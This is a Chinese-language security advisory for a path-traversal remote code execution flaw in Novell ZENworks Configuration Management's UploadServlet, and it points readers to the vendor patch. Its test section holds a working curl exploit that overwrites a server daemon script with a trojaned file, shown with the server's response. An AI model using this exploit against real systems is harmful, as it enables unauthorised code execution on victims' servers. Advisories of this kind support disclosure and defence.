安全研究
安全漏洞
Novell ZENworks Configuration Management UploadServlet远程代码执行漏洞
发布日期:2010-03-30
更新日期:2010-04-26
受影响系统:
Novell ZENworks Configuration Management 10.1不受影响系统:
Novell ZENworks Configuration Management 10.3描述:
BUGTRAQ ID: 39114
Novell ZENworks Configuration Management是ZENworks系统网关工具中的配置管理解决方案。
ZENworks Configuration Management所启动的ZENworks Server(zenserver.exe)服务进程中存在远程代码执行漏洞。该服务程序默认监听于TCP 80和443端口上。通过向上述端口提交恶意请求并调用UploadServlet,攻击者就可以向服务器的TEMP目录之外上传恶意文件,之后再访问上传的程序就会导致以zenserver.exe进程的权限执行。
<*来源:Stephen Fewer
链接:http://marc.info/?l=bugtraq&m=127205201010040&w=2
http://www.novell.com/support/viewContent.do?externalId=7005573
*>
测试方法:
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
-rw-rw-r-- 1 zenworkszenworks 554 XXXX-YY-ZZ 69:69 /opt/novell/zenworks/bin/daemon-monitor
$ cat /opt/novell/zenworks/bin/daemon-monitor
SERVICES=`awk -F= '{ if ($1 == # "services") print $2}' /etc/opt/novell/zenworks/monitor.conf`
SLEEPTIME=`awk -F= '{ if ($1 == "sleep") print $2}' /etc/opt/novell/zenworks/monitor.conf`
echo $SERVICES
echo $SLEEPTIME
if [ -z "$SERVICES" ]; then
echo "No services defined in /etc/opt/novell/zenworks/monitor.conf"
exit 1
fi
if [ -z "$SLEEPTIME" ]; then
SLEEPTIME=10
fi
while [ 1 ]; do
sleep $SLEEPTIME
for SRV in $SERVICES; do
/etc/init.d/$SRV status >/dev/null 2>&1 || /etc/init.d/$SRV start
( date ; id ) >> /tmp/monitor.log 2>&1
done
done
$
$ curl -ivkl
'http://zcm.server/zenworks-fileupload/?type=application/octet-stream/../../../../../../../opt/novell/zenworks/bin/&filename=daemon-monitor&overwrite=true'
--data-binary @./daemon-monitor.troyanizado -H "Content-Type: application/octet-stream"
* About to connect() to zcm.server port 80 (#0)
* Trying 127.11.22.33... connected
* Connected to zcm.server (127.11.22.33) port 80 (#0)
> POST
/zenworks-fileupload/?type=application/octet-stream/../../../../../../../opt/novell/zenworks/bin/&filename=daemon-monitor&overwrite=true HTTP/1.1
> User-Agent: curl/7.19.7 (x86_64-redhat-linux-gnu) libcurl/7.19.7 NSS/3.12.6.2 zlib/1.2.3
libidn/1.9 libssh2/1.2.2
> Host: zcm.server
> Accept: */*
> Content-Type: application/octet-stream
> Content-Length: 554
>
< HTTP/1.1 200 OK
HTTP/1.1 200 OK
< Server: Apache-Coyote/1.1
Server: Apache-Coyote/1.1
< Content-Length: 0
Content-Length: 0
< Date: Mon, 26 Apr 2010 21:58:05 GMT
Date: Mon, 26 Apr 2010 21:58:05 GMT
<
* Connection #0 to host zcm.server left intact
* Closing connection #0
$
建议:
厂商补丁:
Novell
------
目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:
http://www.novell.com/support
浏览次数:2493
严重程度:0(网友投票)
绿盟科技给您安全的保障